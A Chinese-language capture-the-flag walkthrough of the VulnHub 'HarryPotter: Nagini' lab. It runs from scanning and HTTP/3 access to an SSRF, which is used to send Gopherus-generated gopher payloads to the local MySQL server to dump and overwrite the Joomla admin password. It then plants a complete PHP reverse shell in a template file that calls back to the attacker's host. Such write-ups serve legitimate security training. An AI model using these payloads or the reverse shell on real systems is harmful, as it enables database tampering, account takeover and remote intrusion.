标签：65% 73% 6c% 00% 6f% 5f% HARRYPOTTER NAGINI vulnhub

准备：

攻击机：虚拟机kali、本机win10。

靶机：HarryPotter: Nagini，下载地址：https://download.vulnhub.com/harrypotter/Nagini.ova，下载后直接vbox打开即可。

知识点：shell反弹、ssrf漏洞、joomla框架扫描、http3环境搭建、Gopherus工具使用、firefox_decrypt工具使用、敏感信息发现、密钥登录。

一：信息收集

1.nmap扫描

使用nmap扫描下端口对应的服务：nmap -T4 -sV -p- -A 172.20.10.2，显示开放了22端口、80端口，开放了ssh服务、http服务。

2.目录扫描

使用gobuster进行目录扫描，命令：gobuster dir -u http://172.20.10.2 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt，发现：note.txt、joomla目录。

访问下note.txt文件，命令：http://172.20.10.2/note.txt，获得提示信息，告诉我们要使用http3访问。

使用gobuster进行二级目录扫描，命令：gobuster dir -u http://172.20.10.2/joomla -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt，发现了很多的文件和目录，访问下目录和文件信息，但是并没有发现有用的信息。

3.框架扫描

访问：http://172.20.10.2/joomla/显示是一个cms系统，使用joomlascan扫描以下，命令：joomscan --url http://172.20.10.2/joomla，发现其版本信息：Joomla 3.9.25和一个备份文件：configuration.php.bak。搜索cms的对用版本的漏洞信息，也只有一个xss的。

查看configuration.php.bak文件，只获得了账户信息和数据库信息：goblin、joomla，但是未获得密码信息。其中localhost应该是只允许本地访问。

二：http3访问

1.http3环境搭建

https需要使用quiche进行搭建，使用quiche我们需要先安装下rust，命令：curl https://sh.rustup.rs -sSf | sh，选择1默认安装就行。

然后我们就下载下quiche，命令：git clone --recursive https://github.com/cloudflare/quiche。

下载完成后，进入quiche目录，然后依次执行cargo build --examples和cargo test。

2.http3利用

环境搭建好后进入quiche/target/debug/examples目录，然后利用http3进行访问，命令：./http3-client https://172.20.10.2，成功获得internalResourceFeTcher.php文件。第二条说是不允许放bak，但是前面joomlascan已经扫出来了。

访问http://172.20.10.2/internalResourceFeTcher.php，输入：https://www.baidu.com/进行测试，发现可以跳转到百度页面，猜测这里存在ssrf漏洞。

三：ssrf漏洞利用与Gopherus工具使用

利用ssrf漏洞怎么能少了Gopherus，先下载下Gopherus，命令：git clone https://github.com/tarunkant/Gopherus.git，然后根据获得数据库用户信息：goblin和数据库名称：joomla，设置参数。

利用生成的payload访问在http://172.20.10.2/internalResourceFeTcher.php?url=进行访问，成功获得数据库内的表信息：joomla_users。需要多次刷新访问才会回显信息。

获取表信息

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%18%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01

查看下表：joomla_users内的数据信息。

获取表内数据

 gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01

仔细查看获得表信息，可以发现是存在id、name、username、email、password、block等属性的，因此和下面信息对应我们可以发现账户名应该为：site_admin，前面的super user对应的应该是name属性，表示其权限。其密码是加密的，那我们就直接写入一个md5密码值，这样我们就可以直接登录了。写入的md5值：bf40ec77d7062a4c2986da0636d8afd7。

更新下password的值。值为：upfine。

更新password的值

 gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%6c%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%55%50%44%41%54%45%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%20%53%45%54%20%70%61%73%73%77%6f%72%64%3d%27%62%66%34%30%65%63%37%37%64%37%30%36%32%61%34%63%32%39%38%36%64%61%30%36%33%36%64%38%61%66%64%37%27%20%77%68%65%72%65%20%75%73%65%72%6e%61%6d%65%3d%27%73%69%74%65%5f%61%64%6d%69%6e%27%3b%01%00%00%00%01

四：获取shell

利用更改之后的密码值和获得账户信息：site_admin/upfine在：http://172.20.10.2/joomla/administrator/index.php进行登录。

在首页的Templates中选择Templates，然后选择Protostar Details and Files主题，修改其error.php代码并进行保存，然后访问http://172.20.10.2/joomla/templates/protostar/error.php，成功获得shell权限。

shell反弹代码

 <?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]

set_time_limit (0);
$VERSION = "1.0";
$ip = '172.20.10.3';
$port = 6688;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>